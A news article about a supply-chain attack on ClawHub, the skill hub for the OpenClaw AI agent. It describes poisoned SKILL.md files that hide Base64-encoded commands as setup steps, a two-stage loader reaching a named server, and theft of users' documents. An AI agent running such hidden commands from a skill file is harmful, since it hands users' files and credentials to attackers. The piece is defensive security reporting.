Our website is made possible by displaying online advertisements to our visitors. Please consider supporting us by whitelisting our website.

Key Highlights

A coordinated supply-chain attack has struck ClawHub, the official plugin hub for the popular OpenClaw AI agent project. The attacks exploit the hub’s lack of strict review mechanisms, allowing malicious skills to slip past developers’ scrutiny. 

According to the security firm SlowMist’s report, this set of poisoned skills is distributing harmful code or content and has imposed significant risks on developers and users. In order not to be left behind, the firm said its team is closely monitoring ClawHub and sending out early warnings through its MistEye system every time there are new threats.

The biggest risk comes with ‘skill folders’ under the AgentSkills specification, especially in OpenClaw: SKILL.md files that act as the main instructions. And unlike regular code, you cannot fully verify these files, with users often running the steps directly.

These Markdown files, running everything from a simple ‘how-to’ through actually executing commands in AI systems, can hide the dangerous commands using various tricks like Base64 encoding; thus, looking like just another step in normal setups, users would be tricked to run malware.

Malicious patterns and attack dynamics

As per a report by Koi Security, after scanning 2,857 skills, it was found that 341 were malicious, showing a typical pattern of supply chain attacks in plugin marketplaces. SlowMist looked at over 400 bad skills and noticed many used the same few websites and IP addresses. This would suggest that the attackers are working in organized groups using similar methods on a large scale.

Attackers often hide their malware on trusted public sites like GitHub Releases or glot.io. They use a two-stage trick. First, they sneak in hidden commands that avoid detection. Then, those commands pull down more dangerous software later. This lets attackers change their tools quickly while the skill still looks safe. They also name skills after crypto, finance, or automation tools because people trust those labels more.

Here’s how the attack usually plays out. A fake skill hides harmful commands inside SKILL.md and makes them look harmless. Those commands secretly download and run malware. First, a small loader connects to a fixed server, like 91.92.242.30. Then it pulls down a bigger program that scans the system, grabs files from folders like Desktop, Documents, and Downloads, and secretly bundles them up to send out.

Real-world examples and developer warnings

The “X (Twitter) Trends” skill illustrates this threat. While its instructions appear normal, it contains a Base64-encoded backdoor. The decoded command executes a program, which then downloads the second-stage payload. Attackers can swap payloads without modifying the original SKILL.md, allowing low-cost iteration and evasion of text-based reviews.

Developers on X shared firsthand experiences. User LLMJunky explained, “Jamieson built a backdoored Claude skill, inflated it to 1 on ClawdHub with 4,000+ fake downloads, then watched devs execute what could have been malicious code.” 

Another X user Shruti Gandhi added, “Agents need their own identities. Own devices, own accounts, own credentials. Minimal permissions to start.” Experts also warned that running these AI agents without isolation can put your SSH keys, API passwords, and other sensitive data at risk.

Mitigation steps for developers

According to Slowmist, developers should double-check every installation step in SKILL.md and avoid running any scripts they aren’t sure about. Be cautious if a prompt asks for your password, system access, or changes to settings. Only get tools and dependencies from trusted sources. Running safety checks, like Clawdbot’s doctor command, can help spot problems early.

The ClawHub attacks show a serious risk for anyone using AI agents. Installing unverified skills can let hackers take over your system. Developers should run AI agents separately, give them only the permissions they really need, and keep a close eye on activity to stay safe.

Also Read: Vitalik Buterin Says Algorithmic Stablecoins Can Still Be “True DeFi”